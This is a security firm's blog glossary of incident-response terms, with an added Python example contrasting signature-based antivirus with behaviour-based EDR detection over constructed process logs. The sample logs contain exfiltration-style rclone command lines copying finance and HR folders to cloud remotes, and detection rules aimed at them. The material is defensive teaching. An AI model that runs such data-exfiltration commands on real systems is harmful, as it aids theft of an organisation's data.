  • Drew Hjelm

What’s the Word? Common Incident Response Lingo to Know

Folks who work in the technology and cybersecurity industry often use specialized language and lingo to talk about their jobs. For those with untrained ears, the jargon can often be confusing. Sometimes it’s really hard to slip out of computer speak and back into language other folks can understand, but in the event you hear a cybersecurity pro use some of these terms I hope you can use this as a reference to better understand what they’re saying.

Malware – computer software designed and used with malicious intent. Malware can take many forms and be deployed in many ways.

Potentially unwanted programs (PUPs) – sometimes called grayware, these software programs are sometimes used maliciously but can also be used in support of legitimate purposes. These could include:

  • Adware - software with ads. The software and/or ads can often redirect or intercept legitimate traffic.

  • Remote access tools (RAT) – tools that provide a way for someone to control a system remotely. These can be legitimate tools like those used by system administrators and managed service providers (MSPs) to update or troubleshoot software. They may also be tools built for malign purposes, or they may be legitimate tools, like TeamViewer or AnyDesk, that a threat actor installs for their own use.

  • Offensive security tools (OST) – software designed by security researchers which can be used by legitimate firms to conduct security exercises like penetration tests. These tools can also be used by threat actors to exploit systems for further deployment of malware like ransomware. Cobalt Strike is an example of a popular OST.

Threat actor – a person or group intentionally attempting to exploit a victim for a purpose like stealing data or deploying ransomware. Sometimes a threat actor is an insider, but most often it is an external party like a criminal gang. Threat actor is the usual term incident responders use to describe the main adversary during an intrusion, and during some investigations there may be more than one threat actor involved. Usage varies, but many incident responders will avoid terms like “attacker,” “bad guy,” or “hacker” in official communications and use threat actor instead.

Ransomware – malware designed to encrypt or otherwise disrupt access to systems and data in exchange for money. Ransomware comes in many forms and has been around since the 1980s but has only become a major nuisance in the past decade due to the rise of criminal groups using cryptocurrencies.

Antivirus (AV) – a protection tool designed to stop malware and PUPs. Some are free, whereas others are paid and centrally managed. Typically, AV software looks at characteristics of a file, such as its hash or known byte patterns (signatures), rather than analyzing how the software behaves once it runs. Traditional AV can therefore miss newer or modified malware that doesn’t match a signature it already knows.

Endpoint Detection and Response (EDR) – a protection tool that not only looks at signatures of malware like traditional AV but can also analyze how software behaves: which process launched it, what it does to files and accounts, and where it connects. EDR tools often also let defenders hunt for signs of threat actor activity in process, logon, and network telemetry that traditional AV doesn’t collect.

Root point of compromise (RPOC) – sometimes called the initial access, this is how the threat actors get their first foothold in a victim’s systems. It may be through an email campaign (phishing), but just as often it is through weak or stolen usernames and passwords (credentials) on remote access services, or through exploiting vulnerable internet-facing systems.

Lateral movement – sometimes called pivoting, “moving laterally” is when a threat actor accesses a second, third, or even tenth system from a system to which they’ve already gained access. It’s like a game of leapfrog or a military campaign of “island hopping” from beachhead to beachhead.

Persistence – after a threat actor exploits a victim and gains access to their systems, they will attempt to create or modify accounts, or install a tool like a RAT or OST, so they can keep a foothold in the victim’s systems even if the original entry point is closed and continue toward their goals (data theft/exfiltration, ransomware, etc.).

Data exfiltration – when a threat actor steals data in any quantity, the data is said to be exfiltrated. Threat actors may simply copy and paste data through a remote desktop window, or they may use tools like Mega, Rclone, or SSH to move large quantities of data out of the network.
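To make the AV versus EDR distinction above concrete, and to show what the exfiltration tooling just described looks like in process logs, here is a small added example in Python. It is not code from the original article or from Helm Information Security. The process records, file hashes, and detection rules are all constructed for illustration: the “known bad” hash list stands in for a signature database, and the behaviour rules (an rclone-style copy to a remote, a remote access tool launched by an Office application) are assumed hunting heuristics, not any vendor’s detections.

```python
"""Signature-style (AV) versus behaviour-style (EDR) detection over constructed process logs."""
import hashlib
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record, the kind of telemetry an EDR sensor collects."""
    host: str
    parent_image: str
    image: str
    cmdline: str
    sha256: str


def _fake_hash(label: str) -> str:
    # Constructed stand-in for a real file hash: we hash a short label, not a binary.
    return hashlib.sha256(label.encode()).hexdigest()


# AV side: a fixed list of hashes of files already known to be bad (constructed).
KNOWN_BAD_HASHES = {_fake_hash("rclone-build-A")}

# EDR side: rules about what a process does, regardless of its name or hash (assumed heuristics).
RCLONE_VERBS = {"copy", "sync", "move", "copyto"}
# rclone addresses cloud storage as "name:path"; a Windows drive like C:\ has a single letter, so it is excluded.
REMOTE_ARG = re.compile(r"^[A-Za-z0-9_-]{2,}:")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "teamviewer.exe"}


def signature_match(event: ProcessEvent) -> bool:
    """Traditional AV style: flag only files whose hash is already on the bad list."""
    return event.sha256 in KNOWN_BAD_HASHES


def behaviour_findings(event: ProcessEvent) -> list[str]:
    """EDR style: flag based on command line and parent process, not on the file itself."""
    findings = []
    args = event.cmdline.split()
    verbs = {a.lower() for a in args} & RCLONE_VERBS
    remotes = [a for a in args if REMOTE_ARG.match(a)]
    if verbs and remotes:
        findings.append(f"possible exfiltration: {sorted(verbs)[0]} to remote {remotes[0]}")
    if event.parent_image.lower() in OFFICE_PARENTS and event.image.lower() in REMOTE_ACCESS_TOOLS:
        findings.append(f"remote access tool {event.image} launched from {event.parent_image}")
    return findings


def triage(events: list[ProcessEvent]) -> list[dict]:
    """Run both detection styles over every event and return the verdicts side by side."""
    return [
        {"host": e.host, "image": e.image,
         "signature": signature_match(e), "behaviour": behaviour_findings(e)}
        for e in events
    ]


# Constructed sample telemetry (hostnames, paths and hashes are made up).
SAMPLE_EVENTS = [
    # The rclone build the AV list knows about, used to push a finance share to cloud storage.
    ProcessEvent("ws01", "explorer.exe", "rclone.exe",
                 r"rclone.exe copy D:\Finance mega:archive --transfers 8", _fake_hash("rclone-build-A")),
    # Same tool, rebuilt and renamed: the hash no longer matches, the behaviour still does.
    ProcessEvent("ws02", "cmd.exe", "svchost_update.exe",
                 r"svchost_update.exe sync C:\Users\Public\hr remote:stash -P", _fake_hash("rclone-build-B")),
    # A legitimate RAT is not on any bad list, but Word should never be the process that starts it.
    ProcessEvent("ws03", "WINWORD.EXE", "AnyDesk.exe",
                 "AnyDesk.exe --silent", _fake_hash("anydesk-release")),
    # Benign admin copy between local drives: neither detection style should fire.
    ProcessEvent("srv01", "cmd.exe", "robocopy.exe",
                 r"robocopy.exe D:\Finance E:\Backup /E", _fake_hash("robocopy-system")),
]


if __name__ == "__main__":
    for verdict in triage(SAMPLE_EVENTS):
        print(verdict)
```

The second event is the point of the exercise: a threat actor who renames or recompiles a tool defeats the hash lookup entirely, while a rule keyed on the command line and parent process keeps working. Real EDR rules are broader than these two, but the split between “what is this file” and “what is this process doing” is the same.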

Breach – in incident response, ‘breach’ typically indicates that sensitive data has been accessed or stolen, usually by a malicious threat actor but sometimes through an unintentional act. During an incident, your privacy counsel and/or incident response team will remind you not to use the word ‘breach’ loosely, because it often carries specific legal ramifications in terms of having to notify regulators, business partners, employees, and/or customers. In other words, don’t use the word ‘breach’ unless you have confirmed that data has been compromised or stolen.

The most important thing isn’t to just know the lingo, it’s to be prepared for how to handle an incident. Helm Information Security can help you navigate the cybersecurity challenges you face before an incident happens. Contact us today to set up a consultation.

